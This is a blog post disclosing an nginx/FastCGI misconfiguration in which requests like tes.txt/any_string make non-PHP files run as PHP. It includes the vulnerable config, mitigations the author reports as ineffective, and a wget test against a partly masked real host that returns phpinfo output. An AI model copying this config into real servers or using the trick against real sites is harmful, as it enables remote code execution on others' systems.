yep this another configuration that trigger a hole that i've found a bit different
from the one from 80sec (http://www.80sec.com/nginx-securit.html) .
For a fastcgi setting on nginx.conf like this (just example):
============
fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
if (!-e $request_filename) {
rewrite ^(.+)$ /index.php?q=$1 last;
}
===========
where /home/any_user/public_html can be any path , the above setting is a non default nginx configuration.
any file extension that requested like : file.extension/any_string will be
treated just like a php script ,
ex: test.txt/any_string_without_php_extension
as example here we've a file text on /home/user/www
==========================
root@host [/home/any_user_and_path/www]# cat tes.txt
====================
where any request of that test.txt like this:
==============================
http://domain.com/tes.txt/any_string_without_php_extension
=============================
will be treated as php script.
ok, based on http://www.80sec.com/nginx-securit.html -> it suggest a patch
on nginx.conf or can be on php.ini
on nginx.conf by adding:
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}
or on php.ini by cgi.fix_pathinfo=0
unfortunetly this will not fix your hole when u've the wrong config above. as i've check it still treated as php script:
===========
root@host [/usr/local/nginx/conf]# cat /usr/local/lib/php.ini | grep cgi.fix_pathinfo
; cgi.fix_pathinfo provides *real* PATH_INFO/PATH_TRANSLATED support for CGI. PHP's
cgi.fix_pathinfo=0
root@host [/usr/local/nginx/conf]# /etc/init.d/httpd restart
Restarting nginx daemon: nginxRemaining processes: 12091
root@host [/usr/local/nginx/conf]# wget http://***********.net/tes.jpg/any_string_without_extension
--08:35:00-- http://***********.net/tes.jpg/any_string_without_extension
=> `any_string_without_extension'
Resolving ***********.net... 204.197.248.127
Connecting to ***********.net|204.197.248.127|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 46,064 --.--K/s
08:35:03 (9.38 MB/s) - `any_string_without_extension' saved [46064]
root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'PHP Version'
<a href="http://www.php.net/"><img border="0" src="/tes.jpg?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.2.17</h1>root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'safe_mode'
<tr><td class="e">safe_mode</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_exec_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">safe_mode_gid</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_include_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">sql.safe_mode</td><td class="v">Off</td><td class="v">Off</td></tr>
<tr><td class="e">safe_mode_allowed_env_vars</td><td class="v">PHP_</td><td class="v">PHP_</td></tr>
<tr><td class="e">safe_mode_protected_env_vars</td><td class="v">LD_LIBRARY_PATH</td><td class="v">LD_LIBRARY_PATH</td></tr>
root@host [/usr/local/nginx/conf]# <br />
=================================================<br />
<br />
(trust me that u must be very careful
when u're gonna setting nginx and fastcgi !!
a little mistake on config will trigger a hole on ur server)
===========================
Special thanks to: Flyff666, Danzel, X-hack, Whitehat, P4, wenkhairu, badwolves , superman,
cakill, ketek, Smith, all Chinese and Indonesians and all my bro
===========================
1 comments:
Nice one Danzel !! conntact me ;)
Post a Comment